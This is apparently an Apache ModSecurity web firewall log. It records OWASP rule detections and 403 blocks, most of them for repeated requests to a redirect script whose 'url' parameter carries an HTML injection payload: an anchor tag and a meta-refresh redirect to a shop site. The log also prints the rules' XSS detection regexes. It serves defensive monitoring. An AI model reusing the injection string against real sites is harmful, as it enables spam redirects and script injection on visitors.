"/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.920372 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.920552 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.920657 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.920850 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.921298 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:05.921564 2026] [security2:error] [pid 1516058:tid 1516096] [client 27.78.84.116:64471] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIajSMeXtzav-mi9SyfdwAAAMY"]
[Mon May 11 20:06:06.698239 2026] [security2:error] [pid 1511173:tid 1511191] [client 43.156.122.201:33278] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIajvjVc-A-CSptvm1hdQAAAE8"], referer: http://www.tchatbooster.fr
[Mon May 11 20:06:14.786647 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.787076 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.787261 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.787380 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.787573 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.788003 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:14.788287 2026] [security2:error] [pid 1534836:tid 1534870] [client 27.78.84.116:65255] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIalteaRXe5lR8y0ZODCQAAAUA"]
[Mon May 11 20:06:23.303732 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.305172 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.305665 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.305777 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.306012 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.306460 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:06:23.306734 2026] [security2:error] [pid 1501831:tid 1501845] [client 27.78.84.116:49706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIan1NddpkriGUb6ZVmMAAAAQw"]
[Mon May 11 20:07:20.326306 2026] [security2:error] [pid 1534836:tid 1534877] [client 43.130.16.212:36666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/12/Dune-etincelle-site-extrait-3.mp3"] [unique_id "agIa2NeaRXe5lR8y0ZODWQAAAUY"]
[Mon May 11 20:07:33.508461 2026] [security2:error] [pid 1511173:tid 1511196] [client 43.165.197.116:52140] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nos-points-de-vente-la-baujue/"] [unique_id "agIa5fjVc-A-CSptvm1hwQAAAFQ"]
[Mon May 11 20:07:37.228762 2026] [security2:error] [pid 1534836:tid 1534885] [client 43.157.188.74:35790] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/Bulletin_adhe\\xcc\\x81sion-APOE-2021.pdf"] [unique_id "agIa6deaRXe5lR8y0ZODeQAAAU4"]
